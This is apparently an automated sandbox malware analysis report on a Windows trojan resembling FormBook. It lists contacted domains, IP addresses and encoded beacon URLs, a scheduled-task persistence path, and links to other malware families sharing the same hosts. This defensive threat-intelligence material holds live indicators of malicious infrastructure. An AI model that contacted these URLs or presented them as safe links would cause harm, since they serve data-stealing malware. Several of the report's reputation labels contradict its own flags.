            https://www.fastmailusercontent.com/filestorage/css/main.css0%Avira URL Cloudsafe
            https://www.fastmail.help/hc/en-us/articles/15000002801410%VirustotalBrowse
            http://www.qrdinamicos.com/3rdj/?QdC=AFMh5N&gNl=jZBvy0udQ72nya4zXQbiXt45CoTcGWwSxfgakTq4JdzmmcUs/sbVPe6dK9wcjd2s4Il3pIOfxWomFNoQbEAT45u/xcgM8nK3ctQKu/SLrVpagLQNn/wFC6g=0%Avira URL Cloudsafe
            http://www.orthonow.live/v6z4/0%Avira URL Cloudsafe
            http://www.fundraiserstuffies.com/sm5u/0%Avira URL Cloudsafe
            https://www.fastmailusercontent.com/filestorage/css/main.css0%VirustotalBrowse
            http://www.orthonow.live/v6z4/0%VirustotalBrowse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
mysticriverpath.com | 216.194.173.237 | true | false | | unknown
www.qrdinamicos.com | 217.160.0.119 | true | false | | unknown
mscuration.com | 3.33.130.190 | true | true | | unknown
www.pu6wac.buzz | 188.114.96.3 | true | false | | unknown
www.hf7777hi.net | 132.226.11.158 | true | false | | unknown
www.orthonow.live | 199.59.243.226 | true | false | | unknown
lmsforsme.com | 3.33.130.190 | true | true | | unknown
fundraiserstuffies.com | 3.33.130.190 | true | true | | unknown
www.soutsour.xyz | 203.161.41.207 | true | true | | unknown
www.jleabres.com | 103.168.172.37 | true | false | | unknown
angrytee.com | 3.33.130.190 | true | true | | unknown
boutiqueinaboxshop.com | 3.33.130.190 | true | true | | unknown
wb88.wb-88.com | 38.47.226.116 | true | false | | unknown
www.mysticriverpath.com | unknown | unknown | true | | unknown
www.wb515.com | unknown | unknown | true | | unknown
www.mscuration.com | unknown | unknown | true | | unknown
www.boutiqueinaboxshop.com | unknown | unknown | true | | unknown
www.personal-stylist.club | unknown | unknown | true | | unknown
www.angrytee.com | unknown | unknown | true | | unknown
www.lmsforsme.com | unknown | unknown | true | | unknown
www.fundraiserstuffies.com | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.jleabres.com/blhi/?gNl=C8WIH5va3s5TreqFc2nELhDO18EwidTtZxXY9LPFT+Lx3xlqM8I5Ju57JxDvAC7mNl8Ctob5Agt863C6qDgbGQkS7yjDKhT2SlbiFn0xwTwlv8oMq0J/ecs=&QdC=AFMh5N | false | Avira URL Cloud: safe | unknown
http://www.boutiqueinaboxshop.com/3c39/?QdC=AFMh5N&gNl=YJ1cks1SYK0GZq42JMKosMxqD7l69+m/NeZhR8z8BBiDd+X2Cv9su+DXwFPagftVLlPhJQa55ON8fFKrMbD5xy4GuGg/d1ltQY/UvK/AgFb7LLw4oj1fG5g= | true | Avira URL Cloud: safe | unknown
http://www.jleabres.com/blhi/ | false | Avira URL Cloud: safe | unknown
http://www.mysticriverpath.com/0guv/ | false | Avira URL Cloud: safe | unknown
http://www.fundraiserstuffies.com/sm5u/?QdC=AFMh5N&gNl=zNZoGmKn88rfb3KOdi+n0xDDAiSnmhNP+SjTw3nNTKqa02KirOkI5zxlnzd0nBaR3gkleMTrs3XUtciJN1tFuT7tPHWqtnmTkchQjLPuknfMv3nJFi7Ou4E= | true | Avira URL Cloud: safe | unknown
http://www.hf7777hi.net/w2w0/ | false | Avira URL Cloud: safe | unknown
http://www.lmsforsme.com/ji0a/ | true | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.mysticriverpath.com/0guv/?QdC=AFMh5N&gNl=koG+9f1JLs4iU3gpYtYeL1r94dP8/9FWskMDX1FP+QK1lg22bIT8kucy8PYjp4kPLlPGQE/9ELG4RRacCoDP+inEdxRGBXRQHVAT/D1/4SMcq2gI6by2YHg= | false | Avira URL Cloud: safe | unknown
http://www.boutiqueinaboxshop.com/3c39/ | true | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.qrdinamicos.com/3rdj/ | false | Avira URL Cloud: safe | unknown
http://www.hf7777hi.net/w2w0/?gNl=0prXS1nuo7L4BRXFxH+6P5N8ZSQ81sbrd+caxMQkr8e3H5z/+yVS+HOiTMdRuolLjIsNRBtZ8MXFl+jKIOJJ6lQvMONrxVe4j9OmCVx+YV9WHy3pokjU6vI=&QdC=AFMh5N | false | Avira URL Cloud: safe | unknown
http://www.angrytee.com/8vcs/?QdC=AFMh5N&gNl=S5368XARNWnsRPU79+engpq5FH91z/VvzYo3ppZunCrDl85kGpMYYQZ3LKQ1c9Pzm3jcz7UCsoRBkqoouNpmJgjgkplBk0Qbj7O+44Ma0M/QxRY+rJ4fr5w= | true | Avira URL Cloud: safe | unknown
http://www.lmsforsme.com/ji0a/?gNl=V3mCM9XQBGvfB9U06Ih+tXIqrPaKM7STaqz3Sg8J9fi/ICLIIWXTyIdm7sWw/CYltmRpxX2KmohWm3ESn2yFDi2EPP2Dl3Wtaq56t2waT9cNTaD0UhcN7pw=&QdC=AFMh5N | true | Avira URL Cloud: safe | unknown
http://www.soutsour.xyz/etzb/ | false | Avira URL Cloud: safe | unknown
http://www.mscuration.com/g9bf/?gNl=lSzW3nVeW6JfMGMA7uN/7lGGplX0heZbz7O+lPV3tkxu97wid/nYpvoiQET18CfdiTSEkQjNZYpiQysHYXobuoEXQaB6E6dp7KAEYXO0AOAuSkjWL8ZFyYk=&QdC=AFMh5N | true | Avira URL Cloud: safe | unknown
http://www.mscuration.com/g9bf/ | true | Avira URL Cloud: safe | unknown
http://www.soutsour.xyz/etzb/?gNl=y1l9UKEI/lQ7TFqul8cFoyc9amTFojzHvoSS/tM0SGjjEe4pj9aFUBRbEUlPxRBYTwZ9epMSinUSWJlauv4T6Qd4dJfAkKACIvt4qodfW5IqShEDlLijX08=&QdC=AFMh5N | false | Avira URL Cloud: safe | unknown
http://www.wb515.com/fykj/ | false | Avira URL Cloud: safe | unknown
http://www.wb515.com/fykj/?QdC=AFMh5N&gNl=35knRvMfoS1B/FjQR0nniARQj9EspOWzm24eQtGg/GuRPegg+KNm598AA4o0kC2C9Cini7tZg+0o0500Ok9c7JziiiuD4vC4eWhlbFnGTmqZG0oUv+qZGLo= | false | Avira URL Cloud: safe | unknown
http://www.qrdinamicos.com/3rdj/?QdC=AFMh5N&gNl=jZBvy0udQ72nya4zXQbiXt45CoTcGWwSxfgakTq4JdzmmcUs/sbVPe6dK9wcjd2s4Il3pIOfxWomFNoQbEAT45u/xcgM8nK3ctQKu/SLrVpagLQNn/wFC6g= | false | Avira URL Cloud: safe | unknown
http://www.orthonow.live/v6z4/ | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.fundraiserstuffies.com/sm5u/ | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | reg.exe, 00000011.00000002.4132806366.0000000008058000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designersG | jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | reg.exe, 00000011.00000002.4132806366.0000000008058000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/? | jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/bThe | jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.tiro.com | jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | reg.exe, 00000011.00000002.4132806366.0000000008058000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.goodfont.co.kr | jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.google.com | reg.exe, 00000011.00000002.4132621406.00000000065E0000.00000004.00000800.00020000.00000000.sdmp, reg.exe, 00000011.00000002.4130930355.00000000040C6000.00000004.10000000.00040000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000017.00000002.4129787142.00000000035F6000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cn/cThe | jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | reg.exe, 00000011.00000002.4132806366.0000000008058000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://blog.ytmc.fun | jlsvOH1c8bSRKqM.exe, AZJifQrhDpEQCA.exe.0.dr | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.galapagosdesign.com/DPlease | jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fonts.com | jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sandoll.co.kr | jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.jleabres.com | DAGiwzvTYsMjq.exe, 00000017.00000002.4131641803.0000000005509000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.urwpp.deDPlease | jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | jlsvOH1c8bSRKqM.exe, 00000000.00000002.1697745017.0000000002778000.00000004.00000800.00020000.00000000.sdmp, AZJifQrhDpEQCA.exe, 00000009.00000002.1799689113.0000000002841000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.com | jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com | jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | reg.exe, 00000011.00000002.4132806366.0000000008058000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | reg.exe, 00000011.00000002.4132806366.0000000008058000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.fastmail.help/hc/en-us/articles/1500000280141 | reg.exe, 00000011.00000002.4130930355.000000000520C000.00000004.10000000.00040000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000017.00000002.4129787142.000000000473C000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.carterandcone.coml | jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ac.ecosia.org/autocomplete?q= | reg.exe, 00000011.00000002.4132806366.0000000008058000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-user.html | jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/ | jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.fastmailusercontent.com/filestorage/css/main.css | reg.exe, 00000011.00000002.4130930355.000000000520C000.00000004.10000000.00040000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000017.00000002.4129787142.000000000473C000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers8 | jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | reg.exe, 00000011.00000002.4132806366.0000000008058000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
103.168.172.37 | www.jleabres.com | unknown | | 7575 | AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | false
216.194.173.237 | mysticriverpath.com | United States | | 22611 | IMH-WESTUS | false
38.47.226.116 | wb88.wb-88.com | United States | | 174 | COGENT-174US | false
199.59.243.226 | www.orthonow.live | United States | | 395082 | BODIS-NJUS | false
203.161.41.207 | www.soutsour.xyz | Malaysia | | 45899 | VNPT-AS-VNVNPTCorpVN | true
217.160.0.119 | www.qrdinamicos.com | Germany | | 8560 | ONEANDONE-ASBrauerstrasse48DE | false
3.33.130.190 | mscuration.com | United States | | 8987 | AMAZONEXPANSIONGB | true
132.226.11.158 | www.hf7777hi.net | United States | | 16989 | UTMEMUS | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1468932
Start date and time: 2024-07-08 09:32:05 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 3s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 3
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: jlsvOH1c8bSRKqM.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@29/16@15/8
EGA Information:
• Successful, ratio: 83.3%
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 109
• Number of non-executed functions: 300
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
                                               Time | Type | Description
                                               03:32:57 | API Interceptor | 1x Sleep call for process: jlsvOH1c8bSRKqM.exe modified
                                               03:32:58 | API Interceptor | 41x Sleep call for process: powershell.exe modified
                                               03:33:03 | API Interceptor | 1x Sleep call for process: AZJifQrhDpEQCA.exe modified
                                               03:33:51 | API Interceptor | 12496220x Sleep call for process: reg.exe modified
                                               08:32:59 | Task Scheduler | Run new task: AZJifQrhDpEQCA path: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe
                                               Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                               103.168.172.37 | eNXDCIvEXI.exe | malicious | FormBook
                                               • www.celebration24.co.uk/mcz6/
                                               103.168.172.37 | H25iQbxCki.exe | malicious | FormBook
                                               • www.celebration24.co.uk/mcz6/
                                               103.168.172.37 | Factura (3).exe | malicious | FormBook
                                               • www.celebration24.co.uk/mcz6/
                                               103.168.172.37 | PO0424024.exe | malicious | FormBook, PureLog Stealer
                                               • www.celebration24.co.uk/pq0o/
                                               199.59.243.226 | http://sectocarewl.online/mona-michelle/ | malicious | Unknown
                                               • ww25.watchdirectvplay.com/_tr
                                               199.59.243.226 | http://ww7.eagleget.com | malicious | Unknown
                                               • ww7.eagleget.com/_tr
                                               199.59.243.226 | file.exe | malicious | Vidar
                                               • survey-smiles.com/
                                               199.59.243.226 | CMV610942X6UI.exe | malicious | FormBook
                                               • www.mommysdaycare.net/9tym/
                                               199.59.243.226 | AWB NO. 077-57676135055.exe | malicious | FormBook
                                               • www.orthonow.live/c7lp/
                                               199.59.243.226 | hOe2JrpIAE.exe | malicious | FormBook, PureLog Stealer
                                               • www.shopusuniform.com/cn26/?V410V=Wwa2UMOYo9JcJMQ5ME0Q+bO7/4aNL8yaSIJN/NKFPRQQ6eA3A90uIzxodQffq+AadB6M&Kr=YtxTb
                                               199.59.243.226 | factura.exe | malicious | FormBook
                                               • www.4cityclean.uno/qpcj/
                                               199.59.243.226 | RSW6103D401005.exe | malicious | FormBook
                                               • www.42bomclub.com/zq0e/
                                               199.59.243.226 | 82xul16VKj.exe | malicious | CryptOne, Vidar
                                               • survey-smiles.com/
                                               199.59.243.226 | rPRESUPUESTO.exe | malicious | FormBook
                                               • www.mommysdaycare.net/k4dg/
                                               203.161.41.207 | purchase order_pdf.exe | malicious | FormBook
                                               • www.hectmalt.xyz/9ntw/?MdEl=DF4c4jTIr0uCfSFFw8k7okOaWiqusMuq77V3jsF9odELuFK4p5vQm2AEcbSTGQxVKs+ZCGJ5ndNcuFNuj9dUX+A+cKpzBpqYQsgpzguPUBB/nrPxtt52Xac=&cv4D=Bv0xSH88iTF48zS0
                                               203.161.41.207 | Your file name without extension goes here.exe | malicious | FormBook
                                               • www.fardehb.top/q9ar/
                                               203.161.41.207 | PO454355 Pdf.exe | malicious | FormBook
                                               • www.marttyes.top/o2rg/
                                               203.161.41.207 | Quotation List Pdf.exe | malicious | FormBook
                                               • www.marttyes.top/o2rg/
                                               203.161.41.207 | DHL Receipt_AWB#20240079104.exe | malicious | FormBook
                                               • www.mandelmj.top/np46/?3Xd=oST4nP2qn9PKRR23DgE4dZvmjMMxILXYN0NS4qfR16liFnJHfC1ot3bGI9j2UY/L1t0t4iV+0dubbUuy30+ljgzKPo1ECGI4Ndt4a7hacRml4Xnva4zvSFI=&Cdl=szJ4
                                               203.161.41.207 | arrival notice_pdf.exe | malicious | FormBook
                                               • www.hectmalt.xyz/9ntw/?CbPtaF=DF4c4jTIr0uCfSFFw8k7okOaWiqusMuq77V3jsF9odELuFK4p5vQm2AEcbSTGQxVKs+ZCGJ5ndNcuFNuj9dUX+A+cKpzBpqYQsgpzguPUBB/nrPxtt52Xac=&NV=CzkTp6UpmNmd
                                               203.161.41.207 | AirWaybill_Document Pdf.exe | malicious | FormBook
                                               • www.marttyes.top/o2rg/
                                               203.161.41.207 | HSBC Bank_Approvel Letter.exe | malicious | FormBook
                                               • www.marttyes.top/gp5e/
                                               Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                               wb88.wb-88.com | http://7b7.creatormantra.in/4VScWz2361HCPn207tiaqfwjsxt14569KMNQKWEFGVUGQCK2892PHKG8826G17 | malicious | Phisher
                                               • 45.76.155.127
                                               wb88.wb-88.com | Al_Safar_Legal_Notice_PDF.exe | malicious | FormBook
                                               • 45.76.179.53
                                               wb88.wb-88.com | uVk9lgKUxs.exe | malicious | FormBook
                                               • 45.76.179.53
                                               wb88.wb-88.com | load_4.bin.exe | malicious | FormBook
                                               • 45.76.179.53
                                               wb88.wb-88.com | Quotation_PDF.exe | malicious | FormBook
                                               • 45.76.179.53
                                               wb88.wb-88.com | DHL.exe | malicious | FormBook
                                               • 45.76.179.53
                                               wb88.wb-88.com | dutch_94854_0293_invoice_30495.exe | malicious | FormBook
                                               • 45.76.179.53
                                               wb88.wb-88.com | Hesaphareketi-01.exe | malicious | FormBook
                                               • 103.107.236.65
                                               wb88.wb-88.com | Halkbank_Ekstre.exe | malicious | FormBook
                                               • 103.107.236.65
                                               www.hf7777hi.net | Your file name without extension goes here.exe | malicious | FormBook
                                               • 132.226.11.158
                                               www.jleabres.com | DHL Receipt_AWB#20240079104.exe | malicious | FormBook
                                               • 103.168.172.52
                                               www.qrdinamicos.com | Your file name without extension goes here.exe | malicious | FormBook
                                               • 217.160.0.119
                                               www.qrdinamicos.com | 7RsDGpyOQk.exe | malicious | FormBook
                                               • 217.160.0.119
                                               www.pu6wac.buzz | Your file name without extension goes here.exe | malicious | FormBook
                                               • 188.114.97.3
                                               www.orthonow.live | AWB NO. 077-57676135055.exe | malicious | FormBook
                                               • 199.59.243.226
                                               Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                               IMH-WESTUS | DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exe | malicious | AgentTesla
                                               • 216.194.161.167
                                               IMH-WESTUS | DHL AWB COMMERCAIL INVOICE AND TRACKNG DETAILS.exe | malicious | AgentTesla
                                               • 216.194.161.167
                                               IMH-WESTUS | DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exe | malicious | AgentTesla
                                               • 216.194.161.167
                                               IMH-WESTUS | DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exe | malicious | AgentTesla
                                               • 216.194.161.167
                                               IMH-WESTUS | https://fhdqc8.fi59.fdske.com/ec/gAAAAABmfGZyxTh2_K7pHFLC0GqgMqzWDGy5rzOEXF5rWzzKyIh9SQQExFxMQ4awca19AuE2VvhAc9xMu62rgsB6VoJB4N9_fBGtHi3bqIWidSZzaqe6vAuqfJ2HLS_07LjIIFB3TPyWrVCoDPci0vJbEOdFpQbvgMhQ2bb5wwjc0QCyYMs2huEbMV0bF6VlM0VyKvcYrSXwroV9aI7YNrZVFratXAJOXua81IBgQ_lBlo0qGGQdFoqJacHMDkjGxuYp664Cy1FCW8W0d91K8bj980Cvliw9OLQxlehUsXbXZowsYCsVKv0Fne-F6gv0Krh2AVe-ilbzwDq1zcnJIobjeErIHapsGWTJtbLVauq4zhAsYdUWRkCB9SiulS3R7ML3XCRzZ_QN | malicious | HTMLPhisher
                                               • 209.182.194.173
                                               IMH-WESTUS | https://fhdqc8.fi59.fdske.com/ec/gAAAAABmfGZyjC4MVZ8WF44ySzBi6efN3zaqod3SxqQ1kDtzYoyQOsWWD19NsGcVNDBcFjl9mUT7fbfISshhTM2Hik02CHjq-9Q67vAot3BfkCz1fsPEPNCf7G7MVRriPpFBDyLvG5wWqHsR-cwOURIaxnerOQ99C00IkC5xo8SyVqmsRm4_h22BEVkgpwhIxN5ZLSZjkxsDiVXWEiomSy9VfeZMSpAZBIiVY5QOn61X75pVs8oUeoKLdPrvk2c30UYd3VO5mnFHavb6nEffGuo1D5oKxYWc0Cn_-p6tPW-P_jOehq5HKz3wTiXh0DEAmqouDGoQMnrEZrqh3uNO8i3DH8OUtiyY0qJrP4tokSeZMhLFcgcGL1rQtDYermPtRGb82rC_qMPluzB5vb8_joMO7PI6RQTXMQ== | malicious | HTMLPhisher
                                               • 209.182.194.173
                                               IMH-WESTUS | https://fhdqc8.fi59.fdske.com/ec/gAAAAABmfGZyxTh2_K7pHFLC0GqgMqzWDGy5rzOEXF5rWzzKyIh9SQQExFxMQ4awca19AuE2VvhAc9xMu62rgsB6VoJB4N9_fBGtHi3bqIWidSZzaqe6vAuqfJ2HLS_07LjIIFB3TPyWrVCoDPci0vJbEOdFpQbvgMhQ2bb5wwjc0QCyYMs2huEbMV0bF6VlM0VyKvcYrSXwroV9aI7YNrZVFratXAJOXua81IBgQ_lBlo0qGGQdFoqJacHMDkjGxuYp664Cy1FCW8W0d91K8bj980Cvliw9OLQxlehUsXbXZowsYCsVKv0Fne-F6gv0Krh2AVe-ilbzwDq1zcnJIobjeErIHapsGWTJtbLVauq4zhAsYdUWRkCB9SiulS3R7ML3XCRzZ_QN | malicious | HTMLPhisher
                                               • 209.182.194.173
                                               IMH-WESTUS | http://outselluar.live | malicious | Unknown
                                               • 199.250.212.132
                                               IMH-WESTUS | DHL AWB COMMERCAIL INVOICE AND BILL OF LANDING TRACKING DEATAILS.exe | malicious | AgentTesla
                                               • 216.194.161.167
                                               IMH-WESTUS | DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exe | malicious | AgentTesla
                                               • 216.194.161.167
                                               COGENT-174US | 36lO1T5GTG.elf | malicious | Gafgyt, Mirai
                                               • 38.58.177.229
                                               COGENT-174US | PvZTwVx9zC.elf | malicious | Gafgyt, Mirai
                                               • 38.58.177.229
                                               COGENT-174US | Do3To1H4zS.elf | malicious | Gafgyt, Mirai
                                               • 38.58.177.229
                                               COGENT-174US | wYbBsQHoeA.elf | malicious | Gafgyt, Mirai
                                               • 38.58.177.229
                                               COGENT-174US | LViQloRLs6.elf | malicious | Gafgyt, Mirai
                                               • 38.58.177.229
                                               COGENT-174US | 6iZHkJpypi.elf | malicious | Mirai, Gafgyt
                                               • 38.58.177.229
                                               COGENT-174US | bRYlOlQolq.elf | malicious | Mirai, Gafgyt
                                               • 38.58.177.229
                                               COGENT-174US | X0IuEdDH.exe | malicious | BlackMoon
                                               • 206.238.199.40
                                               COGENT-174US | Tomcat.exe | malicious | BlackMoon
                                               • 206.238.199.40
                                               COGENT-174US | https://www.bzqmgs.com/ | malicious | Unknown
                                               • 38.174.148.43
                                               BODIS-NJUS | http://sectocarewl.online/mona-michelle/ | malicious | Unknown
                                               • 199.59.243.226
                                               BODIS-NJUS | http://ww7.eagleget.com | malicious | Unknown
                                               • 199.59.243.226
                                               BODIS-NJUS | file.exe | malicious | Vidar
                                               • 199.59.243.226
                                               BODIS-NJUS | BL Draft.exe | malicious | FormBook
                                               • 199.59.243.226
                                               BODIS-NJUS | CMV610942X6UI.exe | malicious | FormBook
                                               • 199.59.243.226
                                               BODIS-NJUS | AWB NO. 077-57676135055.exe | malicious | FormBook
                                               • 199.59.243.226
                                               BODIS-NJUS | hOe2JrpIAE.exe | malicious | FormBook, PureLog Stealer
                                               • 199.59.243.226
                                               BODIS-NJUS | factura.exe | malicious | FormBook
                                               • 199.59.243.226
                                               BODIS-NJUS | RSW6103D401005.exe | malicious | FormBook
                                               • 199.59.243.226
                                               BODIS-NJUS | 82xul16VKj.exe | malicious | CryptOne, Vidar
                                               • 199.59.243.226
                                               AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | purchase order_pdf.exe | malicious | FormBook
                                               • 103.176.91.154
                                               AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | O5JnVwnxEp.rtf | malicious | Unknown
                                               • 103.186.67.211
                                               AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | arm7-20240707-0306.elf | malicious | Mirai
                                               • 103.182.31.16
                                               AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | SecuriteInfo.com.Other.Malware-gen.348.19428.xlsx | malicious | Unknown
                                               • 103.186.67.211
                                               AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | 3jI8pe3luL.elf | malicious | Mirai, Gafgyt, Okiru
                                               • 103.33.12.74
                                               AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | 80TeZdsbeA6B6j4.exe | malicious | FormBook
                                               • 103.191.209.34
                                               AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | tYEY1UeurGz0Mjb.exe | malicious | FormBook
                                               • 103.8.70.95
                                               AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | 0tkRwEewXq.exe | malicious | FormBook
                                               • 103.164.62.155
                                               AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | https://www.support.cryptoplanet.in/downloads.php | malicious | Unknown
